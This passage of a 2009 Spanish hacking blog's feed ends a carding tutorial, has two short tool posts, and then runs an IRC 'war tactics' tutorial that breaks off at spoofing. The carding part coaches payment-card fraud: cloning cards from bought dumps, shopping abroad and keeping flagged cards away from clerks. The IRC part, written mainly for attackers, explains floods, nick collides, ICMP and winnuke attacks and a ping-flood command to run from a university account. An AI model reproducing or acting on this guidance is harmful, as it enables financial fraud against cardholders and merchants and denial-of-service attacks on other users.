maquinita que pega las cintas magneticas al plastico. este es opcional ya que por ally se venden &lt;br /&gt;&lt;br /&gt;tarjetas prefabricadas (White card).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;       Bueno una vez tenemos todo esto consegimos un dump por ally fabricamos unas cuantas tarjetas, copramos un billete de &lt;br /&gt;&lt;br /&gt;avion a algun pais donde nos gustaria hacer las compras y nos bamos.&lt;br /&gt;&lt;br /&gt;       Ahora simplemente simplemente pagamos con la tarjeta en caja como si fuera nuestra. &lt;br /&gt;&lt;br /&gt;   IMPORTANTE:&lt;br /&gt; Es recomendable llevar siempre dinero efectivo cuando sales de compras (para no hacerte el sospechoso en caso de que algo &lt;br /&gt;&lt;br /&gt;salga mal).&lt;br /&gt;&lt;br /&gt; Es importante tambien que las targetas sean de credito i no de debito ya que las de debito siempre piden pin (es dificil &lt;br /&gt;&lt;br /&gt;pillar un dump con pin ya que estos los usan directamente i no los venden)&lt;br /&gt;&lt;br /&gt; En caso de que la tarjeta devuelva el codigo "tarjeta robada" y el vendedor intente quitar la tarjeta NUNCA DEJES QUE TE &lt;br /&gt;&lt;br /&gt;QUITEN LA TARJETA. bajo cualquier excusa llevatelacontigo. SIEMPRE!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;    cuando hagas tus compras intenta ser natural i no te preocupes de nada.&lt;br /&gt;            recuerda que el pensamiento tiene una fuerza tremenda... no dejes que tus paranoyas te molesten a la hora de hacer &lt;br /&gt;&lt;br /&gt;$$$ =)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno pues nada... aqui acabo...Espero haber dato una buena base. Si tienen alguna o quieren que les explique algo&lt;br /&gt;&lt;br /&gt;mas detalladamente un pm&lt;br /&gt;No respondo a gente poco seria, ignorante y menor de edad.&lt;br /&gt;&lt;br /&gt;                   Tutorial escrito por SPQR &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-6377791815887799694?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/6377791815887799694/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/tutorial-carding.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6377791815887799694'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6377791815887799694'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/tutorial-carding.html' title='Tutorial  carding'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-2152790944704639867</id><published>2009-12-02T12:02:00.004+01:00</published><updated>2009-12-02T12:12:34.787+01:00</updated><title type='text'>Script</title><content type='html'>En este post explicare que son y para que  sirven.&lt;br /&gt;&lt;br /&gt;El término Script puede referirse a:&lt;br /&gt;&lt;br /&gt;  * En informática, un script es un guión o conjunto de instrucciones. Permiten la automatización de tareas creando pequeñas utilidades. Es muy utilizado para la administración de sistemas UNIX. Son ejecutados por un intérprete de línea de órdenes y usualmente son archivos de texto. También un script puede considerarse una alteración o acción a una determinada plataforma.&lt;br /&gt;&lt;br /&gt;fuente :wikipedia&lt;br /&gt;&lt;br /&gt;Sabiendo esto como encuentro y utilizo los scripts.&lt;br /&gt;&lt;br /&gt;Se necesita el mozilla firefox y en complementos añades el &lt;span style="color: rgb(51, 0, 51);font-size:130%;" &gt;Grasemonkey&lt;/span&gt; esto te facilitara la entrada de nuevos scripts, los hay para hacerte todo mas facil y los hay para hackear.Para no estar buscandolos manualmente por la red, existe otro programa llamado  &lt;span style="font-weight: bold;"&gt;&lt;span style="font-size:130%;"&gt;Greasefire&lt;/span&gt; &lt;/span&gt;una vez que lo descarges el   pequeño mono aparecerá en la barra de estado de &lt;strong&gt;FireFox&lt;/strong&gt;; si hay &lt;strong&gt;scripts&lt;/strong&gt; para el sitio, este mono se cambiará a color rojo, y al hacer clic en el ícono aparecerá la cantidad de scripts disponibles, y al hacer clic sobre esa cantidad se abrirá una ventana con más información de esos scripts. ¿Nada mal eh? mejor que estar buscando y buscando por la red.&lt;br /&gt;&lt;br /&gt;Tambien puedes añadir tus scrpits creados busca en la google y encontraras muchos&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-2152790944704639867?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/2152790944704639867/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/script.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2152790944704639867'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2152790944704639867'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/script.html' title='Script'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-3691801462312509918</id><published>2009-12-01T12:51:00.003+01:00</published><updated>2009-12-01T12:55:07.045+01:00</updated><title type='text'>Congela tu Disco Duro</title><content type='html'>Los propietarios de Cybercafes  y los usuarios con equipos compartidos están siempre buscando formas de mantener sus equipos funcionando en perfecto estado, esto desde luego porque no hay nada peor para la clientela de un Cafe Internet que encontrar equipos con virus, desconfigurados, que se traban constantemente o que hay que instalarles software que no tienen en dado momento.&lt;br /&gt;&lt;br /&gt;La otra razón importante es el hecho de que son los mismos usuarios los que tienden a modificar configuraciones, grabar o eliminar archivos o bien almacenar información personal que no te sirve más que para ocupar espacio valioso en tus discos. Sin mencionar las amenazas provocadas por virus o programas que instalan y que hacen mas lentos tus equipos.&lt;br /&gt;&lt;br /&gt;Así que hoy te compartimos una solución que seguramente te será de gran utilidad y es congelar tus discos duros. El proceso de congelamiento se refiere a la utilización de un programa que te permite guardar la configuración básica inicial de un equipo y restaurarla en cualquier momento (digamos todos los días por la noche o bien antes de abrir el negocio por la mañana).&lt;br /&gt;&lt;br /&gt;La herramienta se llama &lt;a href="http://deep-freeze.programas-gratis.net/"&gt;&lt;span style="color: rgb(153, 0, 0);"&gt;DEEP FREEZE&lt;/span&gt;&lt;/a&gt; y es un programa que puedes descargar y probar  en este link. El programa te permite grabar una configuración inicial y regresar a ella en el momento que lo desees.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Finalmente sólo recuerda que debes aclarar a tus clientes colocando algún cartel que diga algo como "No respondemos por la información que guardas en los equipos" o "Los equipos son limpiados y restaurados diariamente, guarda tu información en tu usb".&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-3691801462312509918?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/3691801462312509918/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/congela-tu-disco-duro.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/3691801462312509918'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/3691801462312509918'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/12/congela-tu-disco-duro.html' title='Congela tu Disco Duro'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-3904364352187694726</id><published>2009-11-30T12:50:00.000+01:00</published><updated>2009-11-30T13:05:32.081+01:00</updated><title type='text'>Tácticas de guerra en el IRC</title><content type='html'>&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="color: rgb(153, 0, 0);font-size:130%;" &gt;&lt;span style="color: rgb(153, 0, 0);"&gt;1.- Introducción.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;La guerra en el IRC es, por desgracia, algo bastante común. Conviene, a lo menos, estar informado de las distintas técnicas que se suelen usar para "luchar", aunque sea simplemente para detectar que te están atacando y saber cómo lo están haciendo. No es mi intención profundizar demasiado en el tema aunque intentaré detallar algunos puntos que considere convenientes.&lt;br /&gt;&lt;br /&gt;Todo lo que aquí se hable es extensible en general a cualquier red IRC. No obstante en algunos casos muy particulares me referiré a la red IRC hispana ("*.irc-hispano.org"). Ni que decir tiene que la información que se proporciona aquí es con fines educativos; en ningún caso debe ser usada salvo en circunstancias excepcionalmente justificadas. Un uso abusivo puede significar una k/g-line totalmente merecida. Yo no me hago responsable de un posible mal uso de esta info.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 0, 0);font-size:130%;" &gt;&lt;br /&gt;&lt;span style="color: rgb(153, 51, 0); font-weight: bold;"&gt;2.- Ataques.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;En esta sección entraremos en materia... }:-)  Nuestro objetivo: tirar a alguien del server irc.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 102, 0);"&gt;2.1.- Flood.-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Los servidores IRC tienen que controlar el tráfico de entrada (el que proviene del exterior) para evitar su congestión. Una de las formas de conseguirlo es no permitir que un cliente le mande más de una determinada cantidad de información en un pequeño intervalo de tiempo; o lo que es lo mismo: la velocidad con que un cliente puede enviar datos al servidor está limitada.&lt;br /&gt;&lt;br /&gt;Cuando un cliente supera el límite preestablecido por el servidor, éste cierra la conexión con el cliente: lo echa del servidor porque no puede soportar tanto caudal de entrada. El servidor lo "explica" así:&lt;br /&gt;&lt;br /&gt;[1:59] *** _^TkLaS^_ has quit IRC (Excess Flood)&lt;br /&gt;&lt;br /&gt;Un flood, en general, no es otra cosa que mandar mucha información en poco tiempo a alguien para intentar que se sature. Se puede floodear una dirección IP, ..., o lo que ahora nos concierne: un servidor de IRC.&lt;br /&gt;&lt;br /&gt;La manera de aprovechar el flood en nuestro favor consiste en mandar muchas peticiones de información a nuestra víctima, de forma que ésta, al contestar, supere el límite del servidor y éste lo eche. Por ejemplo, si le mandamos muchos /ctcp version's seguidos (requiriendo información sobre el programa cliente que está utilizando) la víctima floodeará al servidor cuando conteste porque mandará muchas veces (tantas como peticiones haya habido) el texto de respuesta al servidor (para que del servidor vaya al cliente que peticionó, i.e., al atacante).&lt;br /&gt;&lt;br /&gt;En esto del flood juega un papel muy importante el número de peticiones que se reciben en un pequeño intervalo de tiempo. Cuantas más se reciban, más posibilidades hay de que el flood tenga éxito. Por ello no es ninguna tontería mandar peticiones desde varios puntos a la vez, y no desde uno sólo, es decir, varios usuarios (¡que podrían ser una misma persona!) de la red IRC manden peticiones a la víctima todos a la vez en un determinado momento. Si los usuarios (nicks) corresponden a una misma persona (una misma dirección IP) se habla de clones. Por tanto, una posible forma de ataque sería crearnos muchos clones y peticionar a la vez desde todos ellos a la víctima.&lt;br /&gt;&lt;br /&gt;Pero los servidores también suelen estar preparados para evitar muchos clones (cada clone ocupa, por decirlo de alguna manera, una "linea" de entrada al servidor, y esto consume recursos del mismo). Suele haber un máximo permitido (en el irc hispano es 2) denegándosele el acceso a la red a un tercer clone, o en caso de que éste lo consiguiese expulsándosele del servidor ("matándolo") (el programa servidor revisa periódicamente las IP's conectadas y detecta cuando hay varios usuarios con una misma dirección IP):&lt;br /&gt;&lt;br /&gt;[1:32] *** _^Virus^_ has quit IRC (Killed (Clones!))&lt;br /&gt;&lt;br /&gt;¿Cómo provocar un flood con más de 2 clones entonces? La respuesta es simple: en principio no se puede. ¿Entonces? Pues la solución es que varias personas distintas se pongan de acuerdo para atacar a la vez a la víctima. Cada persona podría tener a su vez varios clones. Por ejemplo, si A (atacante) quiere atacar a V (víctima), A se pone de acuerdo con B y C (otras 2 personas atacantes). A su vez supongamos que cada atacante tiene 2 clones: i.1 e i.2 (donde i=A,B,C). Entonces tendremos 6 usuarios (conexiones IRC) distintos atacando a V, que serían A.1, A.2, B.1, B.2, C.1 y C.2. Pero hay un problema: ¿cómo sincronizarse para atacar? ¿Cómo "ponerse de acuerdo" para mandar las peticiones en un determinado momento? Para esto existe lo que se denomina "floodnet" que, como habrá adivinado nuestro ávido lector, es una "red" (asociación) de gente cuyo único objetivo es floodear a alguien. La ventaja que tiene es que la sincronización entre los distintos componentes de la floodnet es automática (lo hacen los scripts) lo cual resuelve el problema anterior. También existe lo que se denomina "botnet" y que es análogo a la floodnet pero usando bots (no confundir con los "de servicio"; estos últimos los ponen los servers de la red irc y no los usuarios) los cuales serán lanzados desde alguna shell Unix (intérprete de comandos en una máquina Unix). Los bots suelen estar prohibidos y cuando se detectan, a lo menos, son expulsados:&lt;br /&gt;&lt;br /&gt;[1:32] *** Viernes13 has quit IRC (Killed (You are not welcome to this network!))&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hoy en día tanto los programas clientes de IRC como los scripts implementan protecciones anti-flood que dificultan enormemente el éxito de un ataque de tipo flood. Por ejemplo, cuando detectan varias peticiones seguidas mandan las respuestas espaciadas en el tiempo (con pausas) y no inmediatamente, con lo cual se evita el flood.&lt;br /&gt;&lt;br /&gt;También hay técnicas de flood bastante optimizadas (por ejemplo, usando una floodnet) aunque en general un ataque flood no suele ser demasiado eficiente y es más costoso lograr su éxito que con algunas de las técnicas que se describen a continuación.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 51, 0);"&gt;2.2.- Nick collide.-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Un "nick collide" ocurre cuando dos personas tienen un mismo nick. En principio esto no debería ser posible (el servidor no deja usar un nick que ya está en uso) pero hay dos situaciones en las que podría darse el caso y que se describen en los dos puntos siguientes.&lt;br /&gt;&lt;br /&gt;El resultado de un nick collide depende del servidor (ircd). En servidores antiguos (sin protección) el collide se resuelve matando a los dos usuarios con mismo nick (¡ambos!). En otros más inteligentes (con protección) el servidor guarda información acerca de los usuarios y puede saber que usuario tiene el nick con mayor antigüedad (i.e. quién se lo puso antes), matando únicamente al usuario con el nick más reciente (protegiendo al usuario más "veterano").&lt;br /&gt;&lt;br /&gt;3.2.1.- Split server collide.-&lt;br /&gt;Se basa en aprovechar un net-split:&lt;br /&gt;&lt;br /&gt;- Esperar un split.&lt;br /&gt;- Entrar (conectar) al servidor spliteado.&lt;br /&gt;- Ponerse como nick el de la víctima.&lt;br /&gt;- Esperar a que se deshaga el split.&lt;br /&gt;&lt;br /&gt;Si todo va bien (el servidor no tiene protección), a la vuelta del split se detectará el collide y se matarán tanto al atacante como a la víctima. Lógicamente nuestro usuario atacante será un clone nuestro, con lo cual no pasa nada si es killeado.&lt;br /&gt;&lt;br /&gt;3.2.2.- Lag collide.-&lt;br /&gt;Consiste en aprovechar el lag de un servidor, o lo que es lo mismo, el retraso en recibir los mensajes de otros servidores. Esta técnica es más efectiva que la anterior, pues funciona en servidores con protección.&lt;br /&gt;&lt;br /&gt;Los pasos serían los siguientes:&lt;br /&gt;&lt;br /&gt;- Meter un clone en el servidor lageado.&lt;br /&gt;- Esperar a que la víctima cambie de nick (esto lo detectamos desde otro servidor no lageado).&lt;br /&gt;- Cambiar rápidamente el nick de nuestro clone y ponerle el que se acaba de poner la víctima (el nuevo).&lt;br /&gt;- Esperar al lag. ;)&lt;br /&gt;&lt;br /&gt;Lo que ocurre es que nuestra orden de cambiar el nick para nuestro clone llega antes al servidor (lageado) que la orden de cambio de nick de la víctima debido a que nuestra orden va directamente de nuestro cliente al servidor lageado mientras que la otra va a través de la red IRC (donde hemos supuesto que se introduce un lag notable). Esto hace que el servidor (lageado) tome a nuestro clone como "dueño" legítimo del nick y mande un kill al otro (la víctima). Esto ocurriría en caso de servidores protegidos; si es no protegido el resultado es que ambos mueren, resultado también aceptable, pues hemos acabado con nuestro objetivo.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 102, 0);"&gt;2.3.- Nuke.-&lt;br /&gt;&lt;br /&gt;&lt;/span&gt; "Nuke" es la denominación genérica que se le suele dar a cualquier forma de ataque consistente en mandar paquetes arbitrarios a una determinada dirección IP (no es que sea una definición demasiado ortodoxa pero bueno... :)). Realmente el término "nuke" siempre se ha referido al primero de los dos tipos que comentaremos, aunque aquí se ha preferido tomar una definición más amplia de dicha palabra.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;2.2.1.- ICMP nuke.-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;El más veterano de los nukes [ :-) ] usa un protocolo subyacente de IP, el ICMP ("Internet Control Message Protocol": parte integral del protocolo de Internet [IP] que resuelve errores y controla los mensajes), para romper una conexión cliente-servidor de IRC (tirar a alguien del server). Para entender cómo funciona hay que hablar un poco de protocolos; es aburrido pero no hay más remedio...&lt;br /&gt;&lt;br /&gt;Una conexión IRC (cliente-servidor, que es lo que nos interesa) utiliza el protocolo TCP (nivel 4 [transporte] en la torre OSI), el cual se apoya sobre IP (nivel 3 [red]). IP se encarga, entre otras cosas, de hacer el rutado de paquetes ("datagramas IP"), es decir, dado un destino ir enviando los paquetes por el camino apropiado hasta alcanzar el host destino. TCP no ve nada de esto, tan sólo el destino directamente (manda los segmentos TCP directamente al destino), porque IP lo oculta (hace que el rutado sea transparente a TCP). Lógicamente para que un protocolo de nivel superior funcione correctamente, también deberán hacerlo todos los que estén por debajo. En particular, para que nuestra conexión TCP (IRC) se mantenga "viva", IP debe funcionar perfectamente. Y aquí es donde interviene ICMP: se encarga de informar de posibles anomalías que se han producido en el nivel 3 (IP), como por ejemplo, "host unreachable", que significaría que no se ha podido alcanzar el host (el paquete IP ha ido dando saltos ["hops"] de un nodo a otro, hacia el destino, y ha llegado un momento en el que un determinado nodo intermedio no sabía qué hacer con él o ha expirado el tiempo de vida de dicho paquete). En este caso, el paquete que informa del error (ICMP) lo envía el nodo intermedio que se ha dado cuenta del error  hacia el "remitente" que lanzó el paquete original (que no se ha podido entregar a su destinatario). Los mensajes ICMP se situan dentro del campo de datos de un datagrama IP y se envían exactamente igual que si fueran datos IP (no son prioritarios). No es objetivo de este escrito tratar más a fondo este tema (para los interesados les aconsejo el libro "Internetworking with TCP/IP, vol I", de Douglas E. Comer, disponible en castellano ya en su tercera edición).&lt;br /&gt;&lt;br /&gt;Resumiendo: mediante ICMP informamos de que IP ha fallado, y por tanto, también los niveles superiores como TCP.&lt;br /&gt;&lt;br /&gt;Comprendiendo lo anterior ya se puede intuir en qué consiste el ICMP nuke: mandar mensajes ICMP falseados, engañando al destino, haciéndole creer que el otro extremo ha detectado un error y por tanto, provocando un "cierre" de la comunicación. Vamos a explicar un poco mejor ésto.&lt;br /&gt;&lt;br /&gt;En una conexión siempre tenemos dos extremos, lo que da dos posibilidades a la hora de engañar, según lo hagamos  a uno u otro. En el caso de una conexión IRC, podemos llevar a cabo dos formas de ataque:&lt;br /&gt;&lt;br /&gt;* Server nuking (nukear al server): los mensajes ICMP se mandan al servidor IRC, haciéndole creer que se ha producido un error al intentar comunicarse con el cliente. Como respuesta a este mensaje el server cierra la conexión que tenía con dicho cliente. El efecto producido es la "expulsión" del usuario por parte del servidor.&lt;br /&gt;&lt;br /&gt;* Client nuking (nukear al cliente): esta vez se envían los ICMP's al cliente; éste cree que el servidor no está disponible y cierra la conexión (el cliente). El servidor no sabe nada en principio, pero detecta el cierre de conexión por parte del cliente, dando el correspondiente error y cerrando también la conexión por su parte.&lt;br /&gt;&lt;br /&gt;En teoría las dos fomas de nuking son perfectamente válidas y eficientes, aunque hay que tener ciertas consideraciones en cuenta, como son:&lt;br /&gt;&lt;br /&gt;- tanto servidor como cliente pueden tener protección anti-nuke y puede ser necesario atacar uno porque el otro esté protegido (ver más adelante).&lt;br /&gt;- si atacas a un cliente, éste puede detectar quién le está atacando con un simple analizador de paquetes IP o tracer, y también podría responder con otro ataque de este o cualquier otro tipo (cuidado con quién te metes ;-)).&lt;br /&gt;- si atacas al servidor, el cliente no tiene manera de saber quién le ha "atacado" porque los mensajes ICMP no le han llegado a él sino al servidor (ventaja); pero por otro lado, el servidor sí sabe quién ha hecho el ataque y puede resultar en una K/G-Line a dicho usuario por parte del servidor (el usuario podría ser baneado de toda la red de IRC).&lt;br /&gt;- los inconvenientes de los dos puntos anteriores pueden ser solventados falseando la dirección origen de los mensajes ICMP que se envían. Esta técnica se conoce como "spoofing" (ver punto 4).&lt;br /&gt;&lt;br /&gt;Hay diversos tipos de error ICMP que se pueden utilizar a la hora de hacer un nuke. En cuanto a la información práctica de cómo utilizar un nuker (programa "nukeador"), debemos tener en cuenta que además de suministrarle el tipo de error que se desea producir, juegan un papel muy importante los puertos, tanto origen como destino, que se elijan.&lt;br /&gt;&lt;br /&gt;Una conexión IRC (TCP) queda definida unívocamente por los pares dirección IP origen-puerto origen y dirección IP destino-puerto destino. Estos datos son los que hay que suministrarles al programa nukeador. Puertos típicos del servidor de IRC (será el puerto destino en caso de server nuking o el fuente si se trata de un client nuking) son 6665-9,  4400-6, 7000 y 7777. En realidad cada servidor IRC tiene unos puertos oficialmente reconocidos (que son conocidos públicamente: los podemos leer en el motd ["mensaje del dia"] al entrar en el IRC) y otros que podríamos denominar como privados, y que se usan por ejemplo para las conexiones entre los distintos servidores que forman la red. Un usuario puede estar usando uno de estos puertos "fantasmas" (aunque el servidor también puede limitar el acceso a estos puertos) para esconderse de nukes, puesto que necesitamos conocer este dato para que el nuke sea efectivo.&lt;br /&gt;&lt;br /&gt;También necesitamos conocer el puerto del cliente, aunque esto es más difícil porque varía mucho (no son fijos como en el caso anterior) dependiendo del sistema operativo que esté corriendo dicho cliente, los puertos que ya tuviera ocupados antes de establecer la conexión IRC, étc. Lo normal es hacer un barrido de estos puertos empezando por el 1024 (hay puertos que por convenio siempre se asignan a determinadas tareas y no se pueden usar arbitrariamente con lo cual no necesitamos barrerlos) y acabando en 4000, por ejemplo, aunque podría ser necesario aumentar este número.&lt;br /&gt;&lt;br /&gt;Es también muy útil utilizar un "port-scan": programa que va probando los distintos puertos de una dirección IP (destino) dada e informa de la respuesta recibida para cada uno de  dichos puertos (así podemos saber, por ejemplo, qué puertos de un servidor están dedicados a aceptar conexiones IRC).&lt;br /&gt;&lt;br /&gt;A continuación transcribo mensajes típicos de salida de nuestras potenciales víctimas en una sesión típica de IRC:&lt;br /&gt;&lt;br /&gt;[1:42] *** aRmiTaGe has quit IRC (Read error to aRmiTaGe[ig-183.arrakis.es]: Connection reset by peer)&lt;br /&gt;[1:13] *** KoNtRoL has quit IRC (Read error to KoNtRoL[195.76.99.76]: EOF from client)&lt;br /&gt;[3:17] *** BrOKeNn has quit IRC (Read error to BrOKeNn[194.224.57.171]: Protocol not available)&lt;br /&gt;[5:25] *** Eli has quit IRC (Read error to Eli[info760.jet.es]: Network is unreachable)&lt;br /&gt;[5:26] *** Eli has quit IRC (Read error to Eli[info760.jet.es]: Machine is not on the network)&lt;br /&gt;[4:20] *** vp has quit IRC (Read error to vp[ia-176.arrakis.es]: Connection refused)&lt;br /&gt;[2:41] *** Estrayk has quit IRC (Read error to Estrayk[ctv3011.ctv.es]: No route to host)&lt;br /&gt;&lt;br /&gt;La protección anti-nuke, a grosso modo, pasa por ignorar los mensajes ICMP que lleguen, aunque ésto ya está limitando el propio funcionamiento del protocolo IP, en el sentido de que ICMP es parte integrante de IP y no se debería inhibir (¿qué ocurriría si llega un mensaje "de verdad" y es ignorado?). Se puede llevar a cabo más o menos "finamente": por ejemplo descartar solo los ICMP's de un tipo y no todos los posibles. Se podría lograr con un firewall (software o hardware encargado de filtrar los paquetes provinientes de la red en base a una reglas previamente definidas) convenientemente configurado.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;2.2.2.- OOB nuke.-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;También conocido como 'winnuke', ya que afecta sólo al sistema operativo Windows, en cualquiera de sus "sabores": 3.x, 95 y NT. Se basa en un bug que tiene este SO en la pila de protocolos por el cual el sistema se cuelga ("error de protección general...blah, blah...") cuando recibe un paquete con el flag OOB ("Out of band") activado. El ataque es sencillo: mandar un paquete de este tipo a un puerto (normalmente el 139) de nuestrá víctima (ésta debe estar corriendo Windows, lo cual es muy normal hoy en día). Existen programas ya hechos a los cuales simplemente le das la dirección IP de la víctima y el programa lo hace todo.&lt;br /&gt;&lt;br /&gt;La forma de protegerse es cerrar los puertos por los que nos puedan atacar (el 139 principalmente) o aplicar algún parche al SO para quitarnos el bug. Otra solución menos recomendable es la que llevan a cabo algunos ISPs (proveedores de Internet), y que consiste en filtrar todos los paquetes dirigidos al puerto 139 (inconveniente: nos están  dejando inoperativo ese puerto). Hoy en día es muy popular este bug y normalmente está ampliamente parcheado (aunque siempre habrá algún que otro despistado que no lo tenga instalado }=)).&lt;br /&gt;&lt;br /&gt;Como hemos dicho, este ataque no sólo consigue echar a la víctima del server sino que además le deja colgado el ordenador (tendrá que hacer un reboot), lo que lo hace especialmente peligroso. La víctima saldrá del IRC con un mensaje de tipo ping-timeout como:&lt;br /&gt;&lt;br /&gt;[19:56] *** Goku has quit IRC (Ping timeout for Goku[system.tech.arrakis.es])&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 102, 0);"&gt;2.4.- Ping.-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Algunos los llama también "IP bombs" (bombas IP). Un ping es un tipo de mensaje ICMP que se usa para ver si una máquina se encuentra operativa y accesible. El procedimiento es enviarle un ping a la máquina; ésta lo recibe y contesta. Al recibir la contestación ya sabemos que la máquina vive. Si no se recibe en un plazo dado se considera como no accesible (la máquina podría estar apagada, o todos los "caminos" en la red hacia ella cortados). Además podemos obtener más datos como el grado de saturación de una máquina o red (midiendo el tiempo de respuesta de la máquina, es decir, el tiempo transcurrido desde que una máquina origen envía el ping hasta que recibe la contestación de la otra).&lt;br /&gt;&lt;br /&gt;La manera de usar esto de forma ofensiva consiste en mandar más pings a un usuario de los que su máquina pueda contestar, saturándole su conexión a Internet. Por tanto se debe de hacer desde un enlace más potente que el que pretendemos atacar.&lt;br /&gt;&lt;br /&gt;Lo típico es que la víctima esté en su casa y tenga un modem. Por tanto, necesitamos una conexión a inet más rápida que eso. Lo normal es atacar desde una máquina ubicada ya en la red (conectada mediante ATM, FDDI, ...). Por ejemplo, puede valer la cuenta de la Universidad ;-). La forma de hacerlo sería abriéndonos un shell y tecleando:&lt;br /&gt;&lt;br /&gt; $  ping -s 32000 &lt;direcc.&gt;&lt;br /&gt;&lt;br /&gt;(la sintaxis puede variar ligeramente según sistema operativo).&lt;br /&gt;&lt;br /&gt;Los paquetes que se envían al hacer ping son típicamente muy pequeños. Con el modificador   -s estamos forzando un nuevo tamaño (32000 bytes es aceptable; también podeis probar con 64000).&lt;br /&gt;&lt;br /&gt;Pensad: un modem de 28.8 tardará unos 18 segs. en recibir 64 Kbytes (sin considerar compresión), mientras que desde nuestra shell lo hemos mandado en ¡¡décimas de segundo!! Si consideramos además que el comando ping manda más de un paquete (los que queramos) ... ¡boom! Tendréis el modem de vuestra víctima trabajando a toda pastilla para nada y fastidiándole todo lo que esté haciendo. En particular, le estropearéis su conexión al IRC: en el mejor de los casos la víctima tendrá un lag horroroso y el peor será expulsada del servidor por "ping time-out".&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 102, 0);"&gt;2.5.- Ssping.-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Nos encontramos ante otro bug parecido al del OOB, que afecta a Win95 y NT (aunque no a todas las configuraciones), y cuya idea es que el "maravilloso" Windows "se lía" a la hora de reconstruir paquetes que le han llegado fragmentados y acaba con un cuelgue del ordenador. El ataque consiste en precisamente mandar esos paquetes fragmentados a la víctima.&lt;br /&gt;&lt;br /&gt;Un bug de este tipo es viejo conocido de los sistemas UNIX (el ataque se conocía como "ping of death"); pero la novedad es que ahora lo sufren los Windows. Aunque son cosas técnicamente diferentes, la forma de proceder a la hora de atacar es análoga a OOB: solo hay que saber la dirección IP de la víctima y ¡boom!: le dejamos colgado el ordenador.&lt;br /&gt;&lt;br /&gt;La solución pasa por parchear el S.O. En particular, este bug parece que no afecta al Trumpet Winsock así que si lo usais estareis protegidos.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 102, 0);"&gt; 3.- Spoofing.-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Esta técnica no es un ataque en sí pero permite mejorar y perfeccionar cualquier ataque (de los anteriores, por ejemplo). 